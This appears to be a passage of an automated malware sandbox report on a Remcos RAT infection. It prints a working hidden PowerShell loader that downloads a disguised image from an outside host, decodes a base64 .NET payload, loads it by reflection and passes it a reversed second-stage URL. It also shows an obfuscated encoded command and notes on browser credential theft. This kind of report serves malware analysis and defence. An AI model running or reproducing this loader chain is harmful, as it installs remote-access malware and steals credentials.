'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\antre.vbs"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.mrhh/88082/6.13.271.701//:ptth' , '1' , 'c:\programdata\' , 'antre','regasm',''))} }"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.mrhh/88082/6.13.271.701//:ptth' , '1' , 'c:\programdata\' , 'antre','regasm',''))} }"Jump to behavior
                      Source: nots.dat.15.drBinary or memory string: [Program Manager]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00434C52 cpuid 15_2_00434C52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,15_2_00452036
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_004520C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,15_2_00452313
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,15_2_00448404
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_0045243C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,15_2_00452543
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_00452610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,15_2_0040F8D1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,15_2_004488ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,15_2_00451CD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,15_2_00451F50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,15_2_00451F9B
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00448957 GetSystemTimeAsFileTime,15_2_00448957
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041B60D GetUserNameW,15_2_0041B60D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,15_2_00449190
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.4449110.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000002.628166706.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3800, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED
                      Contains functionality to steal Chrome passwords or cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data15_2_0040BA12
                      Contains functionality to steal Firefox passwords or cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\15_2_0040BB30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db15_2_0040BB30

                      Remote Access Functionality

                      barindex
                      Detected Remcos RAT
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-999Z97Jump to behavior
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.4449110.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000002.628166706.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3800, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe15_2_0040569A

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information321
                      Scripting                      		Valid Accounts11
                      Native API                      		321
                      Scripting                      		1
                      DLL Side-Loading                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Web Service                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts43
                      Exploitation for Client Execution                      		1
                      DLL Side-Loading                      		1
                      Bypass User Account Control                      		2
                      Obfuscated Files or Information                      		211
                      Input Capture                      		1
                      Account Discovery                      		Remote Desktop Protocol211
                      Input Capture                      		23
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts121
                      Command and Scripting Interpreter                      		1
                      Windows Service                      		1
                      Access Token Manipulation                      		1
                      Install Root Certificate                      		2
                      Credentials In Files                      		1
                      System Service Discovery                      		SMB/Windows Admin Shares3
                      Clipboard Data                      		21
                      Encrypted Channel                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Service Execution                      		11
                      Registry Run Keys / Startup Folder                      		1
                      Windows Service                      		1
                      DLL Side-Loading                      		NTDS4
                      File and Directory Discovery                      		Distributed Component Object ModelInput Capture1
                      Non-Standard Port                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts3
                      PowerShell                      		Network Logon Script322
                      Process Injection                      		1
                      Bypass User Account Control                      		LSA Secrets34
                      System Information Discovery                      		SSHKeylogging1
                      Remote Access Software                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                      Registry Run Keys / Startup Folder                      		1
                      Masquerading                      		Cached Domain Credentials2
                      Security Software Discovery                      		VNCGUI Input Capture2
                      Non-Application Layer Protocol                      		Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Modify Registry                      		DCSync21
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal Capture213
                      Application Layer Protocol                      		Exfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                      Virtualization/Sandbox Evasion                      		Proc Filesystem3
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Access Token Manipulation                      		/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron322
                      Process Injection                      		Network Sniffing1
                      System Owner/User Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                      Remote System Discovery                      		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
